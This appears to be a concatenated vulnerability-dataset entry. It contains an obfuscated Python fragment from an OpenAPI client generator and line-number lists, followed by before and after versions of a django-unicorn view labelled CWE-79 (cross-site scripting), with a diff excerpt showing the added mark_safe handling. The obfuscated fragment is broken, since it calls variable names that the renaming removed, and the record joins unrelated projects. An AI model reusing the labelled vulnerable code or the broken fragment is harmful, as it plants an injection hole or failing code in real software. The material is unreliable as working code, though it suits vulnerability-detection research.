VAR_4: Optional[int] = None
_type_string: ClassVar[str] = "int"
def FUNC_3(self, VAR_4: Any) -> int:
try:
return int(VAR_4)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_7(CLASS_0):
_type_string: ClassVar[str] = "bool"
def FUNC_3(self, VAR_4: Any) -> bool:
return bool(VAR_4)
VAR_0 = TypeVar("InnerProp", bound=CLASS_0)
@dataclass
class CLASS_8(CLASS_0, Generic[VAR_0]):
inner_property: VAR_0
FUNC_10: ClassVar[str] = "list_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update(self.inner_property.get_imports(VAR_6=prefix))
VAR_10.add("from typing import List")
if self.default is not None:
VAR_10.add("from dataclasses import field")
VAR_10.add("from typing import cast")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
if not isinstance(VAR_4, list):
raise ValidationError()
VAR_4 = list(map(self.inner_property._validate_default, VAR_4))
if isinstance(self.inner_property, CLASS_11): # Fix enums to use the actual value
VAR_4 = str(VAR_4).replace("'", "")
return f"field(default_factory=lambda: cast({self.get_type_string()}, {VAR_4}))"
@dataclass
class CLASS_9(CLASS_0):
inner_properties: List[CLASS_0]
FUNC_10: ClassVar[str] = "union_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
VAR_11 = [p.get_type_string() for p in self.inner_properties]
VAR_12 = ", ".join(VAR_11)
if self.required or VAR_5:
return f"Union[{VAR_12}]"
return f"Optional[Union[{VAR_12}]]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
for VAR_24 in self.inner_properties:
VAR_10.update(VAR_24.get_imports(VAR_6=prefix))
VAR_10.add("from typing import Union")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> Any:
for property in self.inner_properties:
try:
VAR_22 = property._validate_default(VAR_4)
return VAR_22
except ValidationError:
continue
raise ValidationError()
VAR_15: Dict[str, CLASS_10] = {}
@dataclass
class CLASS_10(CLASS_0):
VAR_8: Dict[str, str]
VAR_13: Reference = field(init=False)
VAR_7: InitVar[str]
FUNC_10: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, VAR_7: str) -> None: # type: ignore
VAR_13 = Reference.from_ref(VAR_7)
VAR_14 = 0
while VAR_13.class_name in VAR_15:
VAR_18 = VAR_15[VAR_13.class_name]
if self.values == VAR_18.values:
break # This is the same Enum, we're good
VAR_14 += 1
VAR_13 = Reference.from_ref(f"{VAR_13.class_name}{VAR_14}")
self.reference = VAR_13
super().__post_init__()
VAR_15[self.reference.class_name] = self
@staticmethod
def FUNC_7() -> Dict[str, CLASS_10]:
return VAR_15
@staticmethod
def FUNC_8(VAR_1: str) -> Optional[CLASS_10]:
return VAR_15.get(VAR_1)
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.add(f"from {VAR_6}.{self.reference.module_name} import {self.reference.class_name}")
return VAR_10
@staticmethod
def FUNC_9(VAR_8: List[str]) -> Dict[str, str]:
VAR_20: Dict[str, str] = {}
for i, value in enumerate(VAR_8):
if value[0].isalpha():
VAR_23 = value.upper()
else:
VAR_23 = f"VALUE_{i}"
if VAR_23 in VAR_20:
raise ValueError(f"Duplicate VAR_23 {key} in Enum")
VAR_19 = utils.fix_keywords(utils.sanitize(VAR_23))
VAR_20[VAR_19] = utils.remove_string_escapes(value)
return VAR_20
def FUNC_3(self, VAR_4: Any) -> str:
VAR_16 = {v: k for k, v in self.values.items()}
try:
return f"{self.reference.class_name}.{VAR_16[VAR_4]}"
except KeyError as e:
raise ValidationError() from e
@dataclass
class CLASS_11(CLASS_0):
VAR_13: Reference
@property
def FUNC_10(self) -> str: # type: ignore
VAR_17 = CLASS_10.get_enum(self.reference.class_name)
if VAR_17:
return "enum_property.pyi"
return "ref_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update(
{
f"from {VAR_6}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return VAR_10
def FUNC_3(self, VAR_4: Any) -> Any:
VAR_17 = CLASS_10.get_enum(self.reference.class_name)
if VAR_17:
return VAR_17._validate_default(VAR_4)
else:
raise ValidationError
@dataclass
class CLASS_12(CLASS_0):
_type_string: ClassVar[str] = "Dict[Any, Any]"
FUNC_10: ClassVar[str] = "dict_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.add("from typing import Dict")
if self.default is not None:
VAR_10.add("from dataclasses import field")
VAR_10.add("from typing import cast")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
if isinstance(VAR_4, dict):
return repr(VAR_4)
raise ValidationError
def FUNC_0(
VAR_1: str, VAR_2: bool, VAR_3: oai.Schema
) -> Union[CLASS_1, CLASS_3, CLASS_2, CLASS_4]:
VAR_9 = VAR_3.schema_format
if VAR_9 == "date-time":
return CLASS_2(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_9 == "date":
return CLASS_3(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_9 == "binary":
return CLASS_4(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
else:
return CLASS_1(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required, pattern=VAR_3.pattern)
def FUNC_1(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
VAR_1 = utils.remove_string_escapes(VAR_1)
if isinstance(VAR_3, oai.Reference):
return CLASS_11(VAR_1=name, VAR_2=required, VAR_13=Reference.from_ref(VAR_3.ref), VAR_4=None)
if VAR_3.enum:
return CLASS_10(
VAR_1=name,
VAR_2=required,
VAR_8=CLASS_10.values_from_list(VAR_3.enum),
VAR_7=VAR_3.title or VAR_1,
VAR_4=VAR_3.default,
)
if VAR_3.anyOf:
sub_properties: List[CLASS_0] = []
for sub_prop_data in VAR_3.anyOf:
VAR_21 = FUNC_2(VAR_1=name, VAR_2=required, VAR_3=sub_prop_data)
if isinstance(VAR_21, PropertyError):
return PropertyError(detail=f"Invalid property in union {VAR_1}", VAR_3=sub_prop_data)
sub_properties.append(VAR_21)
return CLASS_9(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default, inner_properties=sub_properties)
if not VAR_3.type:
return PropertyError(VAR_3=data, detail="Schemas must either have one of VAR_17, anyOf, or type defined.")
if VAR_3.type == "string":
return FUNC_0(VAR_1=name, VAR_2=required, VAR_3=data)
elif VAR_3.type == "number":
return CLASS_5(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required)
elif VAR_3.type == "integer":
return CLASS_6(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required)
elif VAR_3.type == "boolean":
return CLASS_7(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_3.type == "array":
if VAR_3.items is None:
return PropertyError(VAR_3=data, detail="type array must have items defined")
VAR_24 = FUNC_2(VAR_1=f"{VAR_1}_item", VAR_2=True, VAR_3=VAR_3.items)
if isinstance(VAR_24, PropertyError):
return PropertyError(VAR_3=VAR_24.data, detail=f"invalid VAR_3 in items of array {VAR_1}")
return CLASS_8(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default, inner_property=VAR_24,)
elif VAR_3.type == "object":
return CLASS_12(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
return PropertyError(VAR_3=data, detail=f"unknown type {VAR_3.type}")
def FUNC_2(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
try:
return FUNC_1(VAR_1=name, VAR_2=required, VAR_3=data)
except ValidationError:
return PropertyError(detail="Failed to validate VAR_4 value", VAR_3=data)
| [
2,
5,
10,
11,
16,
23,
27,
30,
32,
35,
41,
45,
52,
61,
66,
67,
71,
74,
76,
81,
82,
88,
91,
95,
102,
103,
107,
110,
114,
121,
122,
126,
129,
133,
140,
141,
145,
148,
149,
153,
156,
157,
161,
163,
164,
166,
167,
171,
174,
179,
185,
189,
200,
201,
205,
208,
216,
220,
229,
230,
232,
233,
237,
241,
243,
254,
260,
265,
270,
273,
277,
281,
288,
293,
302,
304,
305,
309,
311,
318,
324,
328,
341,
342,
346,
348,
353,
357,
367,
368,
382,
383,
426,
14,
15,
16,
17,
18,
19,
20,
21,
22,
70,
85,
86,
87,
106,
125,
144,
152,
160,
170,
204,
236,
308,
345,
372,
387,
37,
43,
44,
45,
46,
47,
48,
54,
93,
94,
95,
96,
97,
98,
112,
113,
114,
115,
116,
117,
131,
132,
133,
134,
135,
136,
181,
187,
188,
189,
190,
191,
192,
210,
218,
219,
220,
221,
222,
223,
263,
268,
272,
279,
280,
281,
282,
283,
284,
291,
320,
326,
327,
328,
329,
330,
331,
355,
356,
357,
358,
359,
360
] | [
2,
6,
11,
12,
17,
23,
27,
31,
34,
36,
41,
45,
51,
55,
62,
71,
76,
77,
81,
84,
86,
89,
90,
96,
99,
103,
110,
118,
119,
123,
126,
130,
137,
143,
144,
148,
151,
155,
162,
163,
167,
170,
176,
177,
181,
184,
190,
191,
195,
197,
199,
201,
202,
204,
205,
209,
212,
218,
222,
233,
237,
241,
243,
244,
248,
251,
259,
263,
272,
281,
282,
284,
285,
289,
293,
295,
305,
309,
314,
319,
322,
326,
330,
337,
342,
352,
354,
361,
362,
366,
368,
375,
381,
385,
398,
405,
406,
410,
413,
417,
427,
432,
433,
447,
448,
492,
493,
501,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
80,
93,
94,
95,
122,
147,
166,
180,
194,
208,
247,
288,
365,
409,
437,
452,
43,
47,
53,
54,
55,
56,
57,
58,
64,
101,
102,
103,
104,
105,
106,
128,
129,
130,
131,
132,
133,
153,
154,
155,
156,
157,
158,
214,
220,
221,
222,
223,
224,
225,
253,
261,
262,
263,
264,
265,
266,
312,
317,
321,
328,
329,
330,
331,
332,
333,
340,
377,
383,
384,
385,
386,
387,
388,
415,
416,
417,
418,
419,
420
] |
1CWE-79
| import copy
import logging
from functools import wraps
from typing import Dict
from django.core.cache import caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def handle_error(view_func):
"""
Returns a JSON response with an error if necessary.
"""
def wrapped_view(*args, **kwargs):
try:
return view_func(*args, **kwargs)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(view_func)(wrapped_view)
def _process_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest`:
1. construct a Component view
2. set all of the properties on the view from the data
3. execute the type
- update the properties based on the payload for "syncInput"
- call the method specified for "callMethod"
4. validate any fields specified in a Django form
5. construct a `dict` that will get returned in a `JsonResponse` later on
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
component = UnicornView.create(
component_id=component_request.id,
component_name=component_request.name,
request=request,
)
# Get a deepcopy of the data passed in to determine what fields are updated later
original_data = copy.deepcopy(component_request.data)
# Set component properties based on request data
for (property_name, property_value) in component_request.data.items():
set_property_from_data(component, property_name, property_value)
component.hydrate()
validate_all_fields = False
is_reset_called = False
is_refresh_called = False
return_data = None
partials = []
for action in component_request.action_queue:
if action.partial:
partials.append(action.partial)
else:
partials = action.partials
if action.action_type == "syncInput":
sync_input.handle(component_request, component, action.payload)
elif action.action_type == "callMethod":
(
component,
_is_refresh_called,
_is_reset_called,
_validate_all_fields,
return_data,
) = call_method.handle(component_request, component, action.payload)
is_refresh_called = is_refresh_called | _is_refresh_called
is_reset_called = is_reset_called | _is_reset_called
validate_all_fields = validate_all_fields | _validate_all_fields
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
component.complete()
# Re-load frontend context variables to deal with non-serializable properties
component_request.data = orjson.loads(component.get_frontend_context_variables())
# Send back all available data for reset or refresh actions
updated_data = component_request.data
if not is_reset_called:
if not is_refresh_called:
updated_data = {}
for key, value in original_data.items():
if value != component_request.data.get(key):
updated_data[key] = component_request.data.get(key)
if validate_all_fields:
component.validate()
else:
component.validate(model_names=list(updated_data.keys()))
rendered_component = component.render()
component.rendered(rendered_component)
cache = caches[get_cache_alias()]
try:
cache.set(component.component_cache_key, get_cacheable_component(component))
except UnicornCacheError as e:
logger.warning(e)
partial_doms = []
if partials and all(partials):
soup = BeautifulSoup(rendered_component, features="html.parser")
for partial in partials:
partial_found = False
only_id = False
only_key = False
target = partial.get("target")
if not target:
target = partial.get("key")
if target:
only_key = True
if not target:
target = partial.get("id")
if target:
only_id = True
assert target, "Partial target is required"
if not only_id:
for element in soup.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == target
):
partial_doms.append({"key": target, "dom": str(element)})
partial_found = True
break
if not partial_found and not only_key:
for element in soup.find_all():
if "id" in element.attrs and element.attrs["id"] == target:
partial_doms.append({"id": target, "dom": str(element)})
partial_found = True
break
res = {
"id": component_request.id,
"data": updated_data,
"errors": component.errors,
"calls": component.calls,
"checksum": generate_checksum(orjson.dumps(component_request.data)),
}
if partial_doms:
res.update({"partials": partial_doms})
else:
hash = generate_checksum(rendered_component)
if (
component_request.hash == hash
and (not return_data or not return_data.value)
and not component.calls
):
raise RenderNotModified()
# Make sure that partials with comments or blank lines before the root element only return the root element
soup = BeautifulSoup(rendered_component, features="html.parser")
rendered_component = str(get_root_element(soup))
res.update(
{"dom": rendered_component, "hash": hash,}
)
if return_data:
res.update(
{"return": return_data.get_data(),}
)
if return_data.redirect:
res.update(
{"redirect": return_data.redirect,}
)
if return_data.poll:
res.update(
{"poll": return_data.poll,}
)
parent_component = component.parent
if parent_component:
# TODO: Should parent_component.hydrate() be called?
parent_frontend_context_variables = loads(
parent_component.get_frontend_context_variables()
)
parent_checksum = generate_checksum(dumps(parent_frontend_context_variables))
parent = {
"id": parent_component.component_id,
"checksum": parent_checksum,
}
if not partial_doms:
parent_dom = parent_component.render()
component.parent_rendered(parent_dom)
try:
cache.set(
parent_component.component_cache_key,
get_cacheable_component(parent_component),
)
except UnicornCacheError as e:
logger.warning(e)
parent.update(
{
"dom": parent_dom,
"data": parent_frontend_context_variables,
"errors": parent_component.errors,
}
)
res.update({"parent": parent})
return res
def _handle_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest` by adding it to the cache and then either:
- processing all of the component requests in the cache and returning the resulting value if
it is the first component request for that particular component name + component id combination
- return a `dict` saying that the request has been queued
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
# If serial isn't enabled or the wrong cache, just process the request like normal
if not get_serial_enabled():
return _process_component_request(request, component_request)
cache = caches[get_cache_alias()]
# Add the current request `ComponentRequest` to the cache
queue_cache_key = f"unicorn:queue:{component_request.id}"
component_requests = cache.get(queue_cache_key) or []
# Remove `request` from `ComponentRequest` before caching because it is not pickleable
component_request.request = None
component_requests.append(component_request)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if len(component_requests) > 1:
original_epoch = component_requests[0].epoch
return {
"queued": True,
"epoch": component_request.epoch,
"original_epoch": original_epoch,
}
return _handle_queued_component_requests(
request, component_request.name, queue_cache_key
)
def _handle_queued_component_requests(
request: HttpRequest, component_name: str, queue_cache_key
) -> Dict:
"""
Process the current component requests that are stored in cache.
Also recursively checks for new requests that might have happened
while executing the first request, merges them together and returns
the correct appropriate data.
Args:
param request: HttpRequest for the view.
param: component_name: Name of the component, e.g. "hello-world".
param: queue_cache_key: Cache key created from component id which should be unique
for any particular user's request lifecycle.
Returns:
JSON with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
cache = caches[get_cache_alias()]
# Handle current request and any others in the cache by first sorting all of the current requests by ascending order
component_requests = cache.get(queue_cache_key)
if not component_requests or not isinstance(component_requests, list):
raise UnicornViewError(f"No request found for {queue_cache_key}")
component_requests = sorted(component_requests, key=lambda r: r.epoch)
first_component_request = component_requests[0]
try:
# Can't store request on a `ComponentRequest` and cache it because `HttpRequest` isn't pickleable
first_json_result = _process_component_request(request, first_component_request)
except RenderNotModified:
# Catching this and re-raising, but need the finally clause to clear the cache
raise
finally:
# Re-check for requests after the first request is processed
component_requests = cache.get(queue_cache_key)
# Check that the request is in the cache before popping it off
if component_requests:
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if component_requests:
# Create one new `component_request` from all of the queued requests that can be processed
merged_component_request = None
for additional_component_request in copy.deepcopy(component_requests):
if merged_component_request:
# Add new component request action queue to the merged component request
merged_component_request.action_queue.extend(
additional_component_request.action_queue
)
# Originally, the thought was to merge the `additional_component_request.data` into
# the `merged_component_request.data`, but I can't figure out a way to do that in a sane
# manner. This means that for rapidly fired events that mutate `data`, that new
# `data` with be "thrown away".
# Relevant test: test_call_method_multiple.py::test_message_call_method_multiple_with_updated_data
else:
merged_component_request = additional_component_request
# Set new component request data from the first component request's resulting data
for key, val in first_json_result.get("data", {}).items():
merged_component_request.data[key] = val
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
merged_json_result = _handle_component_request(
request, merged_component_request
)
return merged_json_result
return first_json_result
@timed
@handle_error
@csrf_protect
@require_POST
def message(request: HttpRequest, component_name: str = None) -> JsonResponse:
"""
Endpoint that instantiates the component and does the correct action
(set an attribute or call a method) depending on the JSON payload in the body.
Args:
param request: HttpRequest for the function-based view.
param: component_name: Name of the component, e.g. "hello-world".
Returns:
`JsonRequest` with the following structure in the body:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
assert component_name, "Missing component name in url"
component_request = ComponentRequest(request, component_name)
json_result = _handle_component_request(request, component_request)
return JsonResponse(json_result)
| import copy
import logging
from functools import wraps
from typing import Dict, Sequence
from django.core.cache import caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.utils.safestring import mark_safe
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def handle_error(view_func):
"""
Returns a JSON response with an error if necessary.
"""
def wrapped_view(*args, **kwargs):
try:
return view_func(*args, **kwargs)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(view_func)(wrapped_view)
def _process_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest`:
1. construct a Component view
2. set all of the properties on the view from the data
3. execute the type
- update the properties based on the payload for "syncInput"
- call the method specified for "callMethod"
4. validate any fields specified in a Django form
5. construct a `dict` that will get returned in a `JsonResponse` later on
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
component = UnicornView.create(
component_id=component_request.id,
component_name=component_request.name,
request=request,
)
# Get a deepcopy of the data passed in to determine what fields are updated later
original_data = copy.deepcopy(component_request.data)
# Set component properties based on request data
for (property_name, property_value) in component_request.data.items():
set_property_from_data(component, property_name, property_value)
component.hydrate()
validate_all_fields = False
is_reset_called = False
is_refresh_called = False
return_data = None
partials = []
for action in component_request.action_queue:
if action.partial:
partials.append(action.partial)
else:
partials = action.partials
if action.action_type == "syncInput":
sync_input.handle(component_request, component, action.payload)
elif action.action_type == "callMethod":
(
component,
_is_refresh_called,
_is_reset_called,
_validate_all_fields,
return_data,
) = call_method.handle(component_request, component, action.payload)
is_refresh_called = is_refresh_called | _is_refresh_called
is_reset_called = is_reset_called | _is_reset_called
validate_all_fields = validate_all_fields | _validate_all_fields
else:
raise UnicornViewError(f"Unknown action_type '{action.action_type}'")
component.complete()
# Re-load frontend context variables to deal with non-serializable properties
component_request.data = orjson.loads(component.get_frontend_context_variables())
# Get set of attributes that should be marked as `safe`
safe_fields = []
if hasattr(component, "Meta") and hasattr(component.Meta, "safe"):
if isinstance(component.Meta.safe, Sequence):
for field_name in component.Meta.safe:
if field_name in component._attributes().keys():
safe_fields.append(field_name)
# Mark safe attributes as such before rendering
for field_name in safe_fields:
value = getattr(component, field_name)
if isinstance(value, str):
setattr(component, field_name, mark_safe(value))
# Send back all available data for reset or refresh actions
updated_data = component_request.data
if not is_reset_called:
if not is_refresh_called:
updated_data = {}
for key, value in original_data.items():
if value != component_request.data.get(key):
updated_data[key] = component_request.data.get(key)
if validate_all_fields:
component.validate()
else:
component.validate(model_names=list(updated_data.keys()))
rendered_component = component.render()
component.rendered(rendered_component)
cache = caches[get_cache_alias()]
try:
cache.set(component.component_cache_key, get_cacheable_component(component))
except UnicornCacheError as e:
logger.warning(e)
partial_doms = []
if partials and all(partials):
soup = BeautifulSoup(rendered_component, features="html.parser")
for partial in partials:
partial_found = False
only_id = False
only_key = False
target = partial.get("target")
if not target:
target = partial.get("key")
if target:
only_key = True
if not target:
target = partial.get("id")
if target:
only_id = True
assert target, "Partial target is required"
if not only_id:
for element in soup.find_all():
if (
"unicorn:key" in element.attrs
and element.attrs["unicorn:key"] == target
):
partial_doms.append({"key": target, "dom": str(element)})
partial_found = True
break
if not partial_found and not only_key:
for element in soup.find_all():
if "id" in element.attrs and element.attrs["id"] == target:
partial_doms.append({"id": target, "dom": str(element)})
partial_found = True
break
res = {
"id": component_request.id,
"data": updated_data,
"errors": component.errors,
"calls": component.calls,
"checksum": generate_checksum(orjson.dumps(component_request.data)),
}
if partial_doms:
res.update({"partials": partial_doms})
else:
hash = generate_checksum(rendered_component)
if (
component_request.hash == hash
and (not return_data or not return_data.value)
and not component.calls
):
raise RenderNotModified()
# Make sure that partials with comments or blank lines before the root element only return the root element
soup = BeautifulSoup(rendered_component, features="html.parser")
rendered_component = str(get_root_element(soup))
res.update(
{"dom": rendered_component, "hash": hash,}
)
if return_data:
res.update(
{"return": return_data.get_data(),}
)
if return_data.redirect:
res.update(
{"redirect": return_data.redirect,}
)
if return_data.poll:
res.update(
{"poll": return_data.poll,}
)
parent_component = component.parent
if parent_component:
# TODO: Should parent_component.hydrate() be called?
parent_frontend_context_variables = loads(
parent_component.get_frontend_context_variables()
)
parent_checksum = generate_checksum(dumps(parent_frontend_context_variables))
parent = {
"id": parent_component.component_id,
"checksum": parent_checksum,
}
if not partial_doms:
parent_dom = parent_component.render()
component.parent_rendered(parent_dom)
try:
cache.set(
parent_component.component_cache_key,
get_cacheable_component(parent_component),
)
except UnicornCacheError as e:
logger.warning(e)
parent.update(
{
"dom": parent_dom,
"data": parent_frontend_context_variables,
"errors": parent_component.errors,
}
)
res.update({"parent": parent})
return res
def _handle_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest` by adding it to the cache and then either:
- processing all of the component requests in the cache and returning the resulting value if
it is the first component request for that particular component name + component id combination
- return a `dict` saying that the request has been queued
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
# If serial isn't enabled or the wrong cache, just process the request like normal
if not get_serial_enabled():
return _process_component_request(request, component_request)
cache = caches[get_cache_alias()]
# Add the current request `ComponentRequest` to the cache
queue_cache_key = f"unicorn:queue:{component_request.id}"
component_requests = cache.get(queue_cache_key) or []
# Remove `request` from `ComponentRequest` before caching because it is not pickleable
component_request.request = None
component_requests.append(component_request)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if len(component_requests) > 1:
original_epoch = component_requests[0].epoch
return {
"queued": True,
"epoch": component_request.epoch,
"original_epoch": original_epoch,
}
return _handle_queued_component_requests(
request, component_request.name, queue_cache_key
)
def _handle_queued_component_requests(
request: HttpRequest, component_name: str, queue_cache_key
) -> Dict:
"""
Process the current component requests that are stored in cache.
Also recursively checks for new requests that might have happened
while executing the first request, merges them together and returns
the correct appropriate data.
Args:
param request: HttpRequest for the view.
param: component_name: Name of the component, e.g. "hello-world".
param: queue_cache_key: Cache key created from component id which should be unique
for any particular user's request lifecycle.
Returns:
JSON with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
cache = caches[get_cache_alias()]
# Handle current request and any others in the cache by first sorting all of the current requests by ascending order
component_requests = cache.get(queue_cache_key)
if not component_requests or not isinstance(component_requests, list):
raise UnicornViewError(f"No request found for {queue_cache_key}")
component_requests = sorted(component_requests, key=lambda r: r.epoch)
first_component_request = component_requests[0]
try:
# Can't store request on a `ComponentRequest` and cache it because `HttpRequest` isn't pickleable
first_json_result = _process_component_request(request, first_component_request)
except RenderNotModified:
# Catching this and re-raising, but need the finally clause to clear the cache
raise
finally:
# Re-check for requests after the first request is processed
component_requests = cache.get(queue_cache_key)
# Check that the request is in the cache before popping it off
if component_requests:
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
if component_requests:
# Create one new `component_request` from all of the queued requests that can be processed
merged_component_request = None
for additional_component_request in copy.deepcopy(component_requests):
if merged_component_request:
# Add new component request action queue to the merged component request
merged_component_request.action_queue.extend(
additional_component_request.action_queue
)
# Originally, the thought was to merge the `additional_component_request.data` into
# the `merged_component_request.data`, but I can't figure out a way to do that in a sane
# manner. This means that for rapidly fired events that mutate `data`, that new
# `data` with be "thrown away".
# Relevant test: test_call_method_multiple.py::test_message_call_method_multiple_with_updated_data
else:
merged_component_request = additional_component_request
# Set new component request data from the first component request's resulting data
for key, val in first_json_result.get("data", {}).items():
merged_component_request.data[key] = val
component_requests.pop(0)
cache.set(
queue_cache_key, component_requests, timeout=get_serial_timeout(),
)
merged_json_result = _handle_component_request(
request, merged_component_request
)
return merged_json_result
return first_json_result
@timed
@handle_error
@csrf_protect
@require_POST
def message(request: HttpRequest, component_name: str = None) -> JsonResponse:
"""
Endpoint that instantiates the component and does the correct action
(set an attribute or call a method) depending on the JSON payload in the body.
Args:
param request: HttpRequest for the function-based view.
param: component_name: Name of the component, e.g. "hello-world".
Returns:
`JsonRequest` with the following structure in the body:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
assert component_name, "Missing component name in url"
component_request = ComponentRequest(request, component_name)
json_result = _handle_component_request(request, component_request)
return JsonResponse(json_result)
| xss | {
"code": [
"from typing import Dict"
],
"line_no": [
4
]
} | {
"code": [
"from typing import Dict, Sequence",
"from django.utils.safestring import mark_safe",
" if hasattr(component, \"Meta\") and hasattr(component.Meta, \"safe\"):",
